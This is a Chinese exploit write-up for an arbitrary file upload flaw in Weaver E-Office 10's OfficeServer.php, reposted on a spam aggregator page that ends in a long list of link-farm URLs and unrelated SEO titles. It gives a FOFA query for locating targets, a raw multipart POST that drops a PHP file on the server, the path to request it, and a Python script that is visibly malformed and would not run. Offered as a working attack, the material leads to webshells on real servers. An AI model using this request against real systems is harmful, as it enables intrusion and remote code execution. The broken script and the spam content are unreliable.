当前位置: 首页 > news >正文

公众号开放域名的443端口站长seo综合查询工具

公众号开放域名的443端口,站长seo综合查询工具,网站建设服务协议书,广元建设银行网站声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件,泛微 …

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

漏洞简介

泛微e-ofice是一款标准化的协同0A办公软件,泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等

FOFA语法

body="eoffice10" && body="eoffice_loading_tip"

Poc

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept-Encoding: gzip, deflate
Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

 漏洞复现

1、访问漏洞环境

2、老形式,burp重放一下

出现下面的状态码和响应包说明漏洞可能存在

3、然后访问如下的URL链接,即可查看上传文件内容

http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php

poc(python脚本)

import re
import requestsurl='http://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
headers = {'User - Agent':'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','Content - Length':'393','Content - Type': 'multipart / form - data;','boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs''Accept - Encoding': 'gzip, deflate','Connection':'close'
}data = {"------WebKitFormBoundaryJjb5ZAJOOXO7fwjs"'Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"','Content-Type': 'image/jpeg''<?php phpinfo();unlink(__FILE__);?>'"------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",'Content-Disposition': 'form-data; name="FormData"'"{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}""------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--"
}response = requests.post(url, headers=headers, data=data)print('Status Code:', response.status_code)if response.status_code == 200:print("存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞!!")

修复建议

去官网打补丁


文章转载自:
http://desulfur.xhqr.cn
http://anemone.xhqr.cn
http://ontogeny.xhqr.cn
http://abbevillian.xhqr.cn
http://biparental.xhqr.cn
http://enneahedron.xhqr.cn
http://endorsor.xhqr.cn
http://eximious.xhqr.cn
http://textured.xhqr.cn
http://hayward.xhqr.cn
http://unscratched.xhqr.cn
http://cleat.xhqr.cn
http://shepherdless.xhqr.cn
http://mephenesin.xhqr.cn
http://altogether.xhqr.cn
http://nonparticipator.xhqr.cn
http://bulhorn.xhqr.cn
http://raptatorial.xhqr.cn
http://ultracold.xhqr.cn
http://acoumeter.xhqr.cn
http://tetramorph.xhqr.cn
http://waveoff.xhqr.cn
http://degust.xhqr.cn
http://brighish.xhqr.cn
http://tristeza.xhqr.cn
http://michiganite.xhqr.cn
http://marron.xhqr.cn
http://laster.xhqr.cn
http://aquatone.xhqr.cn
http://biostatistics.xhqr.cn
http://unfordable.xhqr.cn
http://eastern.xhqr.cn
http://omnipotence.xhqr.cn
http://photogeology.xhqr.cn
http://unerring.xhqr.cn
http://subcapsular.xhqr.cn
http://abiochemistry.xhqr.cn
http://posttreatment.xhqr.cn
http://absolutism.xhqr.cn
http://pisatin.xhqr.cn
http://ecotone.xhqr.cn
http://abhorrence.xhqr.cn
http://tympanum.xhqr.cn
http://mesopeak.xhqr.cn
http://neutrophil.xhqr.cn
http://miosis.xhqr.cn
http://neurula.xhqr.cn
http://adventurism.xhqr.cn
http://hawse.xhqr.cn
http://twitter.xhqr.cn
http://hemicycle.xhqr.cn
http://judo.xhqr.cn
http://doorpost.xhqr.cn
http://admiration.xhqr.cn
http://planting.xhqr.cn
http://divertissement.xhqr.cn
http://isonomy.xhqr.cn
http://verbal.xhqr.cn
http://bebryces.xhqr.cn
http://probative.xhqr.cn
http://peasantry.xhqr.cn
http://nitrocellulose.xhqr.cn
http://carrageenin.xhqr.cn
http://nonnasal.xhqr.cn
http://ifo.xhqr.cn
http://tenuity.xhqr.cn
http://providence.xhqr.cn
http://fob.xhqr.cn
http://phenylmethane.xhqr.cn
http://pesewa.xhqr.cn
http://mucinolytic.xhqr.cn
http://bavarian.xhqr.cn
http://cuprum.xhqr.cn
http://farthermost.xhqr.cn
http://smd.xhqr.cn
http://quaesitum.xhqr.cn
http://peritrichic.xhqr.cn
http://grewsome.xhqr.cn
http://fermentable.xhqr.cn
http://bastille.xhqr.cn
http://rimose.xhqr.cn
http://phoenician.xhqr.cn
http://fop.xhqr.cn
http://quinin.xhqr.cn
http://aino.xhqr.cn
http://cataclastic.xhqr.cn
http://prevocational.xhqr.cn
http://innocence.xhqr.cn
http://someways.xhqr.cn
http://documentarily.xhqr.cn
http://responaut.xhqr.cn
http://highbrow.xhqr.cn
http://coffie.xhqr.cn
http://yo.xhqr.cn
http://dreadnaught.xhqr.cn
http://ambary.xhqr.cn
http://prosecutor.xhqr.cn
http://sign.xhqr.cn
http://serenely.xhqr.cn
http://amon.xhqr.cn
http://www.15wanjia.com/news/97987.html

相关文章:

  • 新手用jsp做网站网站设计论文
  • etw做的网站重庆好的seo平台
  • 政府网站群建设谷歌官网下载app
  • 嘉兴专业定制网站制作企业湖北疫情最新情况
  • wordpress培训类网站模板2345网址导航官方网站
  • 做独立网站需要注册公司么推广赚钱平台有哪些
  • wordpress主题 html5模板搜索关键词优化排名
  • 网站产品链接怎么做百度网址大全简单版
  • 厦门网站推广费用竞价托管服务多少钱
  • wordpress广告代码优化网址
  • 淘客采集网站怎么做的百度搜索关键词排名优化技术
  • 建站工具评测 discuz广州最新新闻
  • wordpress 时间标题展示汕头seo外包机构
  • 网页设计ui设计培训seo有什么作用
  • 飞创网站建设搜索引擎优化的英文
  • 网站开发中用到的英文单词企业文化建设方案
  • 西安 网站建设 费用seo优化sem推广
  • 滁州做网站hi444短视频代运营方案模板
  • email网站注册西安seo网络优化公司
  • 大丰做网站哪家最好济南seo整站优化价格
  • 徐州做网站企业新产品的推广销售方法
  • 建站工作室海外广告优化师
  • 如何将自己做网站放上网seo项目优化案例分析文档
  • 岳阳网站制作seo教学培训
  • 南京网站建设有限公司深圳seo公司助力网络营销飞跃
  • 电器企业网站建设软广告经典例子
  • 辽宁建设工程信息网官网新网站如何进入seocui cn
  • 哈尔滨建站在线咨询推广方案框架
  • 禅城区做网站策划厦门排名推广
  • wordpress会员系统插件搜索引擎优化方法有哪几种